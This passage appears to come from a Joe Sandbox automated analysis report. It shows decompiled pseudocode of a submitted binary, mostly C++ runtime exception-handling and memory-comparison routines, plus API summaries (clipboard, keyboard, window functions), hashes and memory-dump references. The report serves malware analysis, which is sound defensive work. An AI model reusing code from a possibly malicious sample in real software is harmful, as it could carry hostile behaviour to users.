																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E00BD787D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00BCDCB5(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00BD76A2();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00BD76A2();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E00BD11DB(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E00BD746A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0xbe48c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E00BCDCB5(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00BD7426( &_v64);
											E00BD8D65( &_v64, 0xbe328c);
											L64:
											 *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E00BD42BE(_t204, _t225, _t202);
											L00BD737A(_a8, _a16, _t218);
											_t166 = E00BD7392(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E00BD773C(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                          0x00bd7ae2
                          0x00bd7aeb
                          0x00bd7af4
                          0x00bd7afa
                          0x00bd7b02
                          0x00bd7b04
                          0x00bd7b07
                          0x00bd7b0d
                          0x00bd7e81
                          0x00bd7e81
                          0x00bd7e86
                          0x00bd7e8a
                          0x00bd7e8e
                          0x00bd7e8f
                          0x00bd7e92
                          0x00bd7e93
                          0x00bd7e94
                          0x00bd7e97
                          0x00bd7e99
                          0x00bd7e9c
                          0x00bd7e9d
                          0x00bd7e9e
                          0x00bd7ea1
                          0x00bd7ea6
                          0x00bd7ea6
                          0x00bd7ea9
                          0x00bd7eac
                          0x00bd7eae
                          0x00bd7eb0
                          0x00bd7eb0
                          0x00bd7eb6
                          0x00bd7ebb
                          0x00bd7ebe
                          0x00bd7ec0
                          0x00bd7ec3
                          0x00bd7ec6
                          0x00bd7ec7
                          0x00bd7ed5
                          0x00bd7eda
                          0x00bd7edf
                          0x00bd7ee2
                          0x00bd7ee5
                          0x00bd7ee8
                          0x00bd7eeb
                          0x00bd7eec
                          0x00bd7eef
                          0x00bd7ef7
                          0x00bd7ef9
                          0x00bd7efd
                          0x00000000
                          0x00bd7efd
                          0x00bd7f06
                          0x00bd7b1c
                          0x00bd7b1c
                          0x00bd7b25
                          0x00bd7c22
                          0x00bd7c22
                          0x00bd7c25
                          0x00000000
                          0x00bd7b54
                          0x00bd7b54
                          0x00bd7b59
                          0x00000000
                          0x00bd7b5f
                          0x00bd7b5f
                          0x00bd7b67
                          0x00bd7e1f
                          0x00bd7e1f
                          0x00bd7b6d
                          0x00bd7b72
                          0x00bd7b75
                          0x00bd7b7a
                          0x00bd7b81
                          0x00bd7b86
                          0x00000000
                          0x00bd7bbe
                          0x00bd7bc6
                          0x00bd7c2a
                          0x00bd7c2a
                          0x00bd7c2d
                          0x00bd7c30
                          0x00bd7c32
                          0x00bd7c35
                          0x00bd7c38
                          0x00bd7c3e
                          0x00bd7dea
                          0x00bd7dea
                          0x00bd7ded
                          0x00000000
                          0x00bd7def
                          0x00bd7def
                          0x00bd7df2
                          0x00000000
                          0x00bd7df8
                          0x00bd7e08
                          0x00bd7e0d
                          0x00000000
                          0x00bd7e0d
                          0x00bd7df2
                          0x00bd7c44
                          0x00bd7c44
                          0x00bd7c48
                          0x00000000
                          0x00bd7c4e
                          0x00bd7c4e
                          0x00bd7c55
                          0x00bd7c6d
                          0x00bd7c6d
                          0x00bd7c70
                          0x00bd7c73
                          0x00bd7c89
                          0x00bd7c8e
                          0x00bd7c91
                          0x00bd7c94
                          0x00bd7c97
                          0x00bd7c9a
                          0x00bd7c9d
                          0x00bd7ca0
                          0x00bd7ca6
                          0x00bd7ca6
                          0x00bd7ca9
                          0x00bd7cac
                          0x00bd7cbb
                          0x00bd7cbc
                          0x00bd7cbc
                          0x00bd7cbe
                          0x00bd7cc1
                          0x00bd7cc7
                          0x00bd7cca
                          0x00bd7cd0
                          0x00bd7cd2
                          0x00bd7cd5
                          0x00bd7cd8
                          0x00bd7cde
                          0x00bd7ce1
                          0x00bd7ce6
                          0x00bd7ce6
                          0x00bd7ce9
                          0x00bd7cec
                          0x00bd7cef
                          0x00bd7cf2
                          0x00bd7cf5
                          0x00bd7cfa
                          0x00bd7cfb
                          0x00bd7cfc
                          0x00bd7cfd
                          0x00bd7cfe
                          0x00bd7d01
                          0x00bd7d04
                          0x00bd7d06
                          0x00000000
                          0x00bd7d08
                          0x00bd7d08
                          0x00bd7d0f
                          0x00bd7d14
                          0x00bd7d17
                          0x00bd7d19
                          0x00000000
                          0x00000000
                          0x00bd7d1b
                          0x00bd7d1e
                          0x00bd7d1f
                          0x00bd7d22
                          0x00bd7d24
                          0x00000000
                          0x00bd7d26
                          0x00bd7d26
                          0x00bd7d29
                          0x00000000
                          0x00bd7d29
                          0x00000000
                          0x00bd7d24
                          0x00bd7d3d
                          0x00bd7d43
                          0x00bd7d46
                          0x00bd7d49
                          0x00bd7d4c
                          0x00bd7d4d
                          0x00bd7d52
                          0x00bd7d53
                          0x00bd7d56
                          0x00bd7d59
                          0x00bd7d5c
                          0x00bd7d5f
                          0x00bd7d60
                          0x00bd7d65
                          0x00bd7d65
                          0x00bd7d68
                          0x00bd7d68
                          0x00000000
                          0x00bd7d2c
                          0x00bd7d2c
                          0x00bd7d2d
                          0x00bd7d30
                          0x00bd7d33
                          0x00bd7d36
                          0x00bd7d36
                          0x00000000
                          0x00bd7d3b
                          0x00bd7cd8
                          0x00bd7cca
                          0x00bd7d6b
                          0x00bd7d6e
                          0x00bd7d6f
                          0x00bd7d72
                          0x00bd7d75
                          0x00bd7d78
                          0x00bd7d7b
                          0x00bd7d7b
                          0x00bd7d84
                          0x00bd7d87
                          0x00bd7d87
                          0x00bd7ca0
                          0x00bd7d8a
                          0x00bd7d8e
                          0x00bd7d90
                          0x00bd7d93
                          0x00bd7d99
                          0x00bd7d99
                          0x00bd7da1
                          0x00bd7da6
                          0x00bd7e10
                          0x00bd7e10
                          0x00bd7e15
                          0x00bd7e19
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7da8
                          0x00bd7dab
                          0x00bd7dae
                          0x00bd7db2
                          0x00bd7dc0
                          0x00bd7dc2
                          0x00bd7dd9
                          0x00bd7ddd
                          0x00bd7de3
                          0x00bd7de4
                          0x00bd7de6
                          0x00000000
                          0x00bd7de8
                          0x00000000
                          0x00bd7de8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7db4
                          0x00bd7db4
                          0x00bd7db6
                          0x00000000
                          0x00bd7db8
                          0x00bd7db8
                          0x00bd7dbc
                          0x00000000
                          0x00bd7dbe
                          0x00bd7dc4
                          0x00bd7dc9
                          0x00bd7dcc
                          0x00bd7dd1
                          0x00bd7dd4
                          0x00000000
                          0x00bd7dd4
                          0x00bd7dbc
                          0x00bd7db6
                          0x00bd7db2
                          0x00bd7c57
                          0x00bd7c57
                          0x00bd7c5e
                          0x00000000
                          0x00bd7c60
                          0x00bd7c60
                          0x00bd7c67
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7c67
                          0x00bd7c5e
                          0x00bd7c55
                          0x00bd7c48
                          0x00bd7bc8
                          0x00bd7bd0
                          0x00bd7bd3
                          0x00bd7bd8
                          0x00bd7bdc
                          0x00bd7bdf
                          0x00bd7be5
                          0x00bd7be8
                          0x00000000
                          0x00bd7bea
                          0x00bd7bea
                          0x00bd7bed
                          0x00bd7bef
                          0x00bd7e20
                          0x00bd7e20
                          0x00000000
                          0x00bd7bf5
                          0x00bd7bfd
                          0x00bd7c08
                          0x00000000
                          0x00000000
                          0x00bd7c11
                          0x00bd7c14
                          0x00bd7c15
                          0x00bd7c18
                          0x00bd7c1a
                          0x00000000
                          0x00bd7c20
                          0x00000000
                          0x00bd7c20
                          0x00000000
                          0x00bd7c1a
                          0x00bd7bf5
                          0x00bd7e25
                          0x00bd7e25
                          0x00bd7e27
                          0x00bd7e28
                          0x00bd7e2f
                          0x00bd7e32
                          0x00bd7e40
                          0x00bd7e45
                          0x00bd7e4a
                          0x00bd7e4d
                          0x00bd7e52
                          0x00bd7e55
                          0x00bd7e58
                          0x00bd7e5a
                          0x00bd7e5c
                          0x00bd7e5c
                          0x00bd7e61
                          0x00bd7e6d
                          0x00bd7e73
                          0x00bd7e78
                          0x00bd7e7b
                          0x00bd7e7c
                          0x00000000
                          0x00bd7e7c
                          0x00bd7be8
                          0x00bd7bc6
                          0x00bd7b86
                          0x00bd7b67
                          0x00bd7b59
                          0x00bd7b25

                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 00BD7C01
                          • ___TypeMatch.LIBVCRUNTIME ref: 00BD7D0F
                          • CatchIt.LIBVCRUNTIME ref: 00BD7D60
                          • _UnwindNestedFrames.LIBCMT ref: 00BD7E61
                          • CallUnexpected.LIBVCRUNTIME ref: 00BD7E7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          • Opcode ID: 18981f42298a59bd5e19324ecdf86086964f89ac31930dc5b53329e88c116eaf
                          • Instruction ID: 84fd0ad0423534ab3acea4980aa4a9d183834617f0631305a37a41358cf3a807
                          • Opcode Fuzzy Hash: 18981f42298a59bd5e19324ecdf86086964f89ac31930dc5b53329e88c116eaf
                          • Instruction Fuzzy Hash: BBB10575884209ABCF25DFA4C8819EEFBF6EF54310B1445EAE8116B312FB31DA51CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAA60 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocEmptyLockOpen
                          • String ID:
                          • API String ID: 3590494090-0
                          • Opcode ID: 75e7e4f92c8a3611a917b39ca51ddcfd395649f6fb0a0b98d3463a15e9d343da
                          • Instruction ID: b60c12a752181185e794195ccffcd599b7f6bf02956b0e76776f7e3483fe283a
                          • Opcode Fuzzy Hash: 75e7e4f92c8a3611a917b39ca51ddcfd395649f6fb0a0b98d3463a15e9d343da
                          • Instruction Fuzzy Hash: BE81C475A002199FCB04DFA8D988AADBBF0FF08315F1484A9E885EB351E734E981CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA2B0 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CaretFocusInvertRect$HideReleaseShow
                          • String ID:
                          • API String ID: 1353628544-0
                          • Opcode ID: e602f3efd1348817a0e357d086944c06ebb43fc6e43bac64c3c1a21c202f44f7
                          • Instruction ID: d6fef497e65af6a2bad0c289172317525434ff65c5ad6155515516783dea16e3
                          • Opcode Fuzzy Hash: e602f3efd1348817a0e357d086944c06ebb43fc6e43bac64c3c1a21c202f44f7
                          • Instruction Fuzzy Hash: A1619274A00209DFCB08DF68C198AADBBF1FF48315F1584A9E8499B351E734ED85CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAD00 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                          • String ID:
                          • API String ID: 1615112705-0
                          • Opcode ID: 2258ffec74b2c17f5e5bb8c61827ca876072dd5b24010795653a07d73c0b39e2
                          • Instruction ID: a0fa44a27fb4211acfc8227779e78f9092a5bff97f524c5863bf2c9bfa69732e
                          • Opcode Fuzzy Hash: 2258ffec74b2c17f5e5bb8c61827ca876072dd5b24010795653a07d73c0b39e2
                          • Instruction Fuzzy Hash: 9B41C4B5904208EFDB00EFA8D4897ADBBF0FF04305F10896DE885AB250EB759994CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC29E0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CreateEvent
                          • String ID:
                          • API String ID: 2692171526-0
                          • Opcode ID: 3f47cd67c0984b81f8b93605c46c57f957f701d80e3579e6647240bb37647eef
                          • Instruction ID: f9db5f6fce2253826d50286078a08df12346ee5ce4c9a49f7bbad1cd7172b7bb
                          • Opcode Fuzzy Hash: 3f47cd67c0984b81f8b93605c46c57f957f701d80e3579e6647240bb37647eef
                          • Instruction Fuzzy Hash: 7E91C9B0908209DFDB04DFA9D488BAEBBF0FB48315F10896DE4559B354D7789988CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCDF30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E00BCDF30(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1358;
				void* _t1359;
				void* _t1365;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E00BDAF01(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0xbe4050;
				E00BCDEF0(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0xbe4050);
				E00BD2137(_a12);
				_t1005 = _a4;
				_t1359 = _t1358 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00BD2120(_t1250, 0xfffffffe, _t1347, 0xbe4050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E00BD20C0(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1365 = _t1014;
								if(_t1365 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E00BCDEF0(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1365 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0xbdc628;
											if(__eflags != 0) {
												_t1245 = E00BD1F10(__eflags, 0xbdc628);
												_t1359 = _t1359 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0xbdc628; // 0xbcdcb5
													 *0xbe7000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1359 = _t1359 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E00BD2100(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00BD2120(_t1017, _t1342, _t1347, 0xbe4050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E00BCDEF0(_t1250, _t1334, _t1342, _t1347, _v12);
										E00BD20E0();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L528;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L528;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
